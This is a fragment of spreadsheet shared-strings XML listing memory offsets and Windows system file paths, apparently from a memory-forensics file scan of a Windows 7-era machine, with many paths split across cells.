    <t>\Windows\System32\DriverStore\FileRepository\bthprint.inf_x86_neutral_e8a51e97a7c39491\bthprin</t>
  </si>
  <si>
    <t>t.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6857d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_usbhub_299dea1039e75d30.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6859e8</t>
  </si>
  <si>
    <t>0xde685aa0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\ade6786d79daeac033126c797c22ad45\MSBuild.</t>
  </si>
  <si>
    <t>ni.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde685d50</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msacm32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6862c8</t>
  </si>
  <si>
    <t>0xde686430</t>
  </si>
  <si>
    <t>0xde6868d0</t>
  </si>
  <si>
    <t>0xde686bb0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v2.0.50727_1033_7994eb100abd5435.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde686cf8</t>
  </si>
  <si>
    <t>0xde687278</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_remoteaccess_110554180baafc8b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde687768</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\tsprint.inf_x86_neutral_c48d421ad2c1e3e3\tsprint.</t>
  </si>
  <si>
    <t>0xde688038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\d9d144a7d32f1a2be5bb64242332fd3</t>
  </si>
  <si>
    <t>1\Microsoft.V</t>
  </si>
  <si>
    <t>isualC.ni.d</t>
  </si>
  <si>
    <t>ll.aux</t>
  </si>
  <si>
    <t>0xde688218</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\deb9ff0e34c9b2a04e596ed3e078</t>
  </si>
  <si>
    <t>dce0\System.I</t>
  </si>
  <si>
    <t>l.Serv</t>
  </si>
  <si>
    <t>ices.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde688518</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\amdk8.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde688e10</t>
  </si>
  <si>
    <t>ation.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde688ec8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Workflow.ComponentModel\v4.0_4.0.0.0__31bf3856</t>
  </si>
  <si>
    <t>em.Workflow</t>
  </si>
  <si>
    <t>.Compo</t>
  </si>
  <si>
    <t>nentModel.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde688f80</t>
  </si>
  <si>
    <t>0xde689170</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.net_data_provider_for_oracle_0000_1ac87488f00b2af0.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6892f0</t>
  </si>
  <si>
    <t>0xde6893d8</t>
  </si>
  <si>
    <t>\Windows\System32\mfcsubs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde689740</t>
  </si>
  <si>
    <t>0xde6898c8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sysmain.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde689a18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\lsi_sas2.inf_x86_neutral_e12a5c4cfbe49204\lsi_sas</t>
  </si>
  <si>
    <t>0xde689f18</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\connect.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68a1e8</t>
  </si>
  <si>
    <t>0xde68a380</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.net_data_provider_for_sqlserver_0000_22ef191981b08b2b.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde68aa40</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_createdisc_components_tables_c2b8c3e0749098d8.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68ad40</t>
  </si>
  <si>
    <t>0xde68b670</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\fc5b547af4fdacc1d11cc3c8446b</t>
  </si>
  <si>
    <t>5f11\System.W</t>
  </si>
  <si>
    <t>orkflow.Com</t>
  </si>
  <si>
    <t>ponent</t>
  </si>
  <si>
    <t>Model.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68b8f0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wevtutil.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68c208</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\lltdres.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68c4b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24356_none_5c07bd39a00</t>
  </si>
  <si>
    <t>d5ba6\GdiPlus</t>
  </si>
  <si>
    <t>0xde68c730</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\bthpan.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68ccb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_pcw_en-us_30a9ef1c7976423b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68d038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_termservice_0409_f96d648f6bc76413.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68d3c8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68d480</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v3.0_wpf_xamlviewer_97ff09273e68a809.cdf-m</t>
  </si>
  <si>
    <t>0xde68d998</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-gb_rssfeed_29449ea7eb4c7797.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68ddf0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_0b932a9a9cc9f99b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68e178</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\980c61fdbff1f35854c8f4f0e5e5</t>
  </si>
  <si>
    <t>f40e\Presenta</t>
  </si>
  <si>
    <t>temXml.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68e298</t>
  </si>
  <si>
    <t>0xde68e658</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_raga_d0fd3c9ac0f8ab1b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68e908</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\netcenter.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68f2c8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\Query.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68f448</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wdmaud.drv.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68f740</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_tapisrv_0000_2e9995ea1b86323e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde68f860</t>
  </si>
  <si>
    <t>0xde68fa78</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmadc.inf_x86_neutral_ce6df7a95faad9ab\mdmadc.in</t>
  </si>
  <si>
    <t>0xde68fd58</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wmploc.DLL.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde690a08</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\eeb90915ee84574ae3281235a6ad92fc\</t>
  </si>
  <si>
    <t>Microsoft.Bui</t>
  </si>
  <si>
    <t>ld.ni.dll.a</t>
  </si>
  <si>
    <t>0xde691038</t>
  </si>
  <si>
    <t>ld.ni.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde691548</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\BrSerId.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde691e38</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\66e091a476c1d09fee7b9ffd2de6</t>
  </si>
  <si>
    <t>576c\Microsof</t>
  </si>
  <si>
    <t>t.Transacti</t>
  </si>
  <si>
    <t>ons.Br</t>
  </si>
  <si>
    <t>idge.Dtc.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde691f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_it-it_d9b3d1222ab13661.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde692038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_esent_0000_5aeb75e54bde718e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde692710</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_remoteaccess_0000_86bc982ae65d5d49.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6928e0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\aaa2194e4c0c2172c6dcf4901aed</t>
  </si>
  <si>
    <t>02b7\System.I</t>
  </si>
  <si>
    <t>l.ni.d</t>
  </si>
  <si>
    <t>ll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde692a40</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_createdisc_components_ccfb52aef0cf0151.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde692b60</t>
  </si>
  <si>
    <t>0xde692f80</t>
  </si>
  <si>
    <t>\Users\Wilfred\Links_x001B_[0K</t>
  </si>
  <si>
    <t>0xde693160</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_usbhub_0409_1bec32773c8babd1.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde693340</t>
  </si>
  <si>
    <t>0xde693478</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Transactions.Bridge.Dtc\v4.0_4.0.0.0__b03f5f7</t>
  </si>
  <si>
    <t>f11d50a3a\Mic</t>
  </si>
  <si>
    <t>rosoft.Tran</t>
  </si>
  <si>
    <t>sactio</t>
  </si>
  <si>
    <t>ns.Bridge.Dtc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6936e8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\luafv.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde693f80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\e7d4014b596f66f32e932c0c8945</t>
  </si>
  <si>
    <t>3b8b\System.R</t>
  </si>
  <si>
    <t>eflection.C</t>
  </si>
  <si>
    <t>ontext</t>
  </si>
  <si>
    <t>.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde694340</t>
  </si>
  <si>
    <t>\Program Files\Windows Sidebar\sidebar.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde694568</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Activities\v4.0_4.0.0.0__31bf3856</t>
  </si>
  <si>
    <t>ctivities.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde694998</t>
  </si>
  <si>
    <t>0xde694d50</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmsun1.inf_x86_neutral_6dcf5920efcd8b9b\mdmsun1.</t>
  </si>
  <si>
    <t>0xde695248</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\zipfldr.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6954c8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\systemcpl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6959e8</t>
  </si>
  <si>
    <t>0xde695b08</t>
  </si>
  <si>
    <t>ion.Design.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde695f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_pt-pt_d8b7a0682ce8adfb.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde697038</t>
  </si>
  <si>
    <t>0xde697128</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\52eff5a0d17bf13acd4b7d44883588cb\dfsvc.ni.e</t>
  </si>
  <si>
    <t>xe.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6971e0</t>
  </si>
  <si>
    <t>exe.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde697560</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_resources_themes_4d0d4910e83c2273.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde697680</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\sysglobl\9219300cf68d4a43af45_x001B_[0K</t>
  </si>
  <si>
    <t>0xde697aa0</t>
  </si>
  <si>
    <t>tancing.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde697c00</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\NetworkMap.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde697e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_speech_common_76cd6f1aaba6e83b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde698450</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\regsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde698890</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\0e5db498879992562320c58b78b2</t>
  </si>
  <si>
    <t>757e\Microsof</t>
  </si>
  <si>
    <t>t.Activitie</t>
  </si>
  <si>
    <t>s.Buil</t>
  </si>
  <si>
    <t>d.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde698f80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\a</t>
  </si>
  <si>
    <t>sync_usersync</t>
  </si>
  <si>
    <t>[1].htm_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6992e8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\midimap.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde699430</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prngt004.inf_x86_neutral_f7b569fe96e4f7ae\prngt00</t>
  </si>
  <si>
    <t>0xde699550</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\298d04c52ecfeccb3e3f35ea7010</t>
  </si>
  <si>
    <t>589f\System.S</t>
  </si>
  <si>
    <t>.Chann</t>
  </si>
  <si>
    <t>els.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde699698</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_ja-jp_d98fca962b0246de.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde699908</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmiodat.inf_x86_neutral_8f2918b26d48efb3\mdmioda</t>
  </si>
  <si>
    <t>0xde699bf0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-au_theme_8b4e352268872029.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69a458</t>
  </si>
  <si>
    <t>0xde69a768</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\iphlpsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69ae20</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_resources_themes_aero_3fd78bf4cb5fa2c4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69b100</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-za_wallpaper_92a67a51c073d8f7.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69b1b8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69b270</t>
  </si>
  <si>
    <t>ni.exe.aux_x001B_[0</t>
  </si>
  <si>
    <t>0xde69b458</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\osk.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69b598</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\8f4a03f76e047b35a4856cabea91</t>
  </si>
  <si>
    <t>164a\Microsof</t>
  </si>
  <si>
    <t>t.Workflow.</t>
  </si>
  <si>
    <t>Compil</t>
  </si>
  <si>
    <t>er.ni.exe.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69be20</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_ugthrsvc_0000_8451c300df70be5f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69c2e0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_ko-kr_d96bc3742b535818.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69c620</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\credui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69ccb0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_bits_0000_a03dbf7d63e833bd.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69d760</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\5a024659d564355b6507b0f1b826</t>
  </si>
  <si>
    <t>92df\Microsof</t>
  </si>
  <si>
    <t>idge.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69de18</t>
  </si>
  <si>
    <t>0xde69e038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wpccpl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69e440</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sti_ci.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69e688</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmsonyu.inf_x86_neutral_b1ca4e47492f36bc\mdmsony</t>
  </si>
  <si>
    <t>u.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69e908</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\gpapi.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde69f318</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\brmfcmf.inf_x86_neutral_33717b093227cd8c\brmfcmf.</t>
  </si>
  <si>
    <t>0xde69f438</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_homebasicn_bf4c063ea00b4d6b.cdf-ms</t>
  </si>
  <si>
    <t>0xde69f820</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_homebasice_bf4c0782a00b4a92.cdf-ms</t>
  </si>
  <si>
    <t>0xde69fb30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmsupra.inf_x86_neutral_7474084e6eaf04bc\mdmsupr</t>
  </si>
  <si>
    <t>0xde69fe50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_resources_themes_aero_shell_normalcolor_en-us_8f1a9ecd4c3325e8.cdf</t>
  </si>
  <si>
    <t>0xde6a0038</t>
  </si>
  <si>
    <t>0xde6a0798</t>
  </si>
  <si>
    <t>ivities.Compiler.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a0858</t>
  </si>
  <si>
    <t>\Windows\System32\tapi32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a0910</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity.Design\v4.0_4.0.0.0__b77a5c561934e</t>
  </si>
  <si>
    <t>089\System.Da</t>
  </si>
  <si>
    <t>ta.Entity.D</t>
  </si>
  <si>
    <t>esign.</t>
  </si>
  <si>
    <t>0xde6a0a38</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_logs_measuredboot_ab1fadc53c86b337.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a0bb8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\9ef42f24ecee3ad5325067f9509d</t>
  </si>
  <si>
    <t>c1cd\System.A</t>
  </si>
  <si>
    <t>ctivities.P</t>
  </si>
  <si>
    <t>resent</t>
  </si>
  <si>
    <t>0xde6a0d98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_dism_066548addf2fbd4b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a0f80</t>
  </si>
  <si>
    <t>0xde6a1158</t>
  </si>
  <si>
    <t>0xde6a1210</t>
  </si>
  <si>
    <t>0xde6a17c8</t>
  </si>
  <si>
    <t>\Windows\System32\ssdpsrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a2320</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\PerfCenterCPL.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a2500</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmetech.inf_x86_neutral_5be2fe46e416a83e\mdmetec</t>
  </si>
  <si>
    <t>h.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a2718</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\WpdBusEnum.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a2910</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnep00g.inf_x86_neutral_cb6ac931b3d225af\prnep00</t>
  </si>
  <si>
    <t>0xde6a3128</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mstsc.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a3828</t>
  </si>
  <si>
    <t>temXml.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a3ae0</t>
  </si>
  <si>
    <t>temData.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a3b98</t>
  </si>
  <si>
    <t>xe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a4110</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.net_clr_data_0409_9334f23ff02764ac.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a4268</t>
  </si>
  <si>
    <t>\System Volume Information\SPP\OnlineMetadataCache\{ebcd2161-388f-42b5-b0d8-5a088eab7fe6}_OnDi</t>
  </si>
  <si>
    <t>0xde6a47c8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\gpedit.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a49b0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ipnathlp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a4b90</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prngt003.inf_x86_neutral_eeb0fb3ee2847db5\prngt00</t>
  </si>
  <si>
    <t>0xde6a5510</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msimtf.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a5810</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\cxraptor_philipstuv1236d_ibv32.inf_x86_neutral_2a</t>
  </si>
  <si>
    <t>f0839f9805ea5</t>
  </si>
  <si>
    <t>f\cxraptor_</t>
  </si>
  <si>
    <t>Philip</t>
  </si>
  <si>
    <t>sTUV1236D_IBV32.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a5930</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\4f4708eed8d8512c9deba582d800</t>
  </si>
  <si>
    <t>098d\Microsof</t>
  </si>
  <si>
    <t>ic.Com</t>
  </si>
  <si>
    <t>patibility.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a59e8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\df94c5c8344f36fd011e2159719c</t>
  </si>
  <si>
    <t>730b\Microsof</t>
  </si>
  <si>
    <t>t.Build.Con</t>
  </si>
  <si>
    <t>versio</t>
  </si>
  <si>
    <t>n.v4.0.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a5aa0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\c4ad734644c7ebd5e39b5d93ce95</t>
  </si>
  <si>
    <t>c521\Microsof</t>
  </si>
  <si>
    <t>t.Internal.</t>
  </si>
  <si>
    <t>Tasks.</t>
  </si>
  <si>
    <t>Dataflow.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a6038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\6bc70f5d3b049fbc1408bab18041</t>
  </si>
  <si>
    <t>1508\System.W</t>
  </si>
  <si>
    <t>eb.Entity.D</t>
  </si>
  <si>
    <t>ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a6320</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_pcw_2115168e47eaddb7.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a6d98</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\2109536e1be0ab0a959b46f49d8a956</t>
  </si>
  <si>
    <t>b\System.Acti</t>
  </si>
  <si>
    <t>vities.ni.d</t>
  </si>
  <si>
    <t>0xde6a7038</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a7578</t>
  </si>
  <si>
    <t>0xde6a76c8</t>
  </si>
  <si>
    <t>temCore.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a79b0</t>
  </si>
  <si>
    <t>0xde6a8618</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.Http\v4.0_4.0.0.0__b03f5f7f11d50a3a\System</t>
  </si>
  <si>
    <t>.Net.Http.dll</t>
  </si>
  <si>
    <t>0xde6a8770</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\a79d769b54b8e8fa578bb1dd7ad9</t>
  </si>
  <si>
    <t>79b4\Microsof</t>
  </si>
  <si>
    <t>patibility.Data.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a8d60</t>
  </si>
  <si>
    <t>0xde6a8ec8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_createdisc_styles_pal_symphony_b9729623521ab9e5.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a8f80</t>
  </si>
  <si>
    <t>0xde6a9038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\ac68556b13398c722aac0caca04d</t>
  </si>
  <si>
    <t>fc8c\System.W</t>
  </si>
  <si>
    <t>eb.Extensio</t>
  </si>
  <si>
    <t>ns.Des</t>
  </si>
  <si>
    <t>ign.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a91d8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8c126d6016cefc83a9b59d0c7a32</t>
  </si>
  <si>
    <t>4144\Presenta</t>
  </si>
  <si>
    <t>temXmlLinq.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a99d8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\9106cdcff1358c54b05c07f4b2a5</t>
  </si>
  <si>
    <t>cb46\System.S</t>
  </si>
  <si>
    <t>ities.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6a9b00</t>
  </si>
  <si>
    <t>\Windows\System32\mstsc.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6aa478</t>
  </si>
  <si>
